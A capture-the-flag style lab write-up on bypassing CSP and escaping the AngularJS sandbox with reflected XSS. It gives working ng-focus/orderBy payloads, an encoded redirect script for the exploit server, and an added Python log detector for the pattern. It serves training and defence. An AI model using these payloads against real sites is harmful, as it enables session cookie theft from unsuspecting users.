Reflected XSS with AngularJS sandbox escape and CSP

Description

This lab uses CSP and AngularJS.

To solve the lab, perform a cross-site scripting attack that bypasses CSP, escapes the AngularJS sandbox, and alerts document.cookie.

Approach

After accessing the lab, I intercepted the search request and sent it to the Burp Suite repeater for analysis:

GET /?search=ichyaboy HTTP/2
Host: 0a5d00b70482d3d2819a4dd800ac00ee.web-security-academy.net
Cookie: session=fuvH1hqf09Ga0CiIwWJksQfVcZN6ki0S
...

In the response, I noticed that my input was being reflected. However, standard XSS payloads wouldn't work due to the web application's Content Security Policy (CSP) and the presence of a sandbox. Therefore, I decided to test some AngularJS CSP bypass payloads from the XSS cheatsheet by PortSwigger.

First, I tried injecting this payload:

<input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">

But I encountered an error:

Search term cannot exceed 80 characters

This indicated that my payload couldn't exceed 80 characters in length. I moved to a shorter payload:

<input id=x ng-focus=$event.composedPath()|orderBy:'(z=alert)(1)'>

To meet the lab's requirement of alerting document.cookie, I modified the payload. Additionally, since the ng-focus attribute requires the input to be focused, and this payload lacked the autofocus attribute, I needed to manually focus on the input tag.

Here is the modified payload:

<input id=x ng-focus=$event.composedPath()|orderBy:'(z=alert)(document.cookie)'>

Now this payload should work, so I will go to the exploit server, where I will host my malicious HTML page containing my final payload, so that whenever the victim visits it the exploit gets triggered.

Building the malicious HTML page payload:

<script>
location="https://0a5d00b70482d3d2819a4dd800ac00ee.web-security-academy.net/?search=<input id=x ng-focus=$event.composedPath()|orderBy:'(z=alert)(document.cookie)'>"
</script>

To trigger the exploit, I used the exploit server to host a malicious HTML page containing the payload. When the victim visits this page, they will be redirected to the lab page with the AngularJS CSP bypass payload, which will trigger the XSS.

Here's the HTML page with the payload, with #x appended to the URL; the fragment focuses the input with the id of x, triggering the ng-focus event:

<script>
location="https://0a5d00b70482d3d2819a4dd800ac00ee.web-security-academy.net/?search=<input id=x ng-focus=$event.composedPath()|orderBy:'(z=alert)(document.cookie)'>#x"
</script>

To ensure the payload is properly handled, I URL-encoded it:

<script>
location='https://0a5d00b70482d3d2819a4dd800ac00ee.web-security-academy.net/?search=%3cinput%20id=x%20ng-focus=$event.composedPath()|orderBy:%27(z=alert)(document.cookie)%27%3e#x'
</script>

Finally, I stored the HTML page code on the exploit server and delivered it to the victim by pressing the "Deliver exploit to victim" button. This successfully bypassed the CSP, triggered the XSS, and solved the lab.
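From the defensive side, as an added example that is not part of the original writeup: the following Python flags access-log requests whose search parameter carries the AngularJS sandbox-escape pattern used in this lab, after URL-decoding the value. The log lines are constructed, and the indicator names are my own.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Regexes for the AngularJS CSP-bypass / sandbox-escape pattern seen in this lab.
# They run against the URL-decoded search value, because the exploit page sends
# the payload percent-encoded (%3cinput%20... in the writeup).
INDICATORS = {
    "angular_event_directive": re.compile(r"\bng-(?:focus|click|mouseover|init)\b", re.I),
    "event_composed_path": re.compile(r"\$event\.composedPath\(\)"),
    "orderby_filter": re.compile(r"\|\s*orderBy\s*:"),
    "array_constructor": re.compile(r"\[\]\.constructor\b"),
    "alias_call": re.compile(r"\(\s*\w+\s*=\s*alert\s*\)\s*\("),  # (z=alert)(...)
}

def search_param(request_line):
    """Return the URL-decoded 'search' value from a GET request line, or None."""
    parts = request_line.split()
    if len(parts) < 2 or parts[0] != "GET":
        return None
    query = urlsplit(parts[1]).query
    values = parse_qs(query, keep_blank_values=True).get("search")
    return values[0] if values else None

def classify(request_line):
    """Return the names of the indicators matched by the request's search parameter."""
    term = search_param(request_line)
    if term is None:
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(term)]

# Constructed sample log lines: a benign search, the writeup's encoded payload
# (the '#x' fragment never reaches the server, so it is absent from the log),
# and a plain script tag that the CSP blocks anyway.
SAMPLE_LOG = [
    "GET /?search=ichyaboy HTTP/2",
    "GET /?search=%3cinput%20id=x%20ng-focus=$event.composedPath()|orderBy:%27(z=alert)(document.cookie)%27%3e HTTP/2",
    "GET /?search=%3Cscript%3Ealert(1)%3C/script%3E HTTP/2",
]

def suspicious_lines(lines=SAMPLE_LOG):
    """Map line index -> matched indicators, keeping only lines with at least one hit."""
    return {i: hits for i, line in enumerate(lines) if (hits := classify(line))}

if __name__ == "__main__":
    for i, hits in suspicious_lines().items():
        print(f"line {i}: {', '.join(hits)}")
```

Note that the decoded payload is exactly 80 characters, so the lab's length check does nothing to stop it; the indicators above match on the expression structure instead.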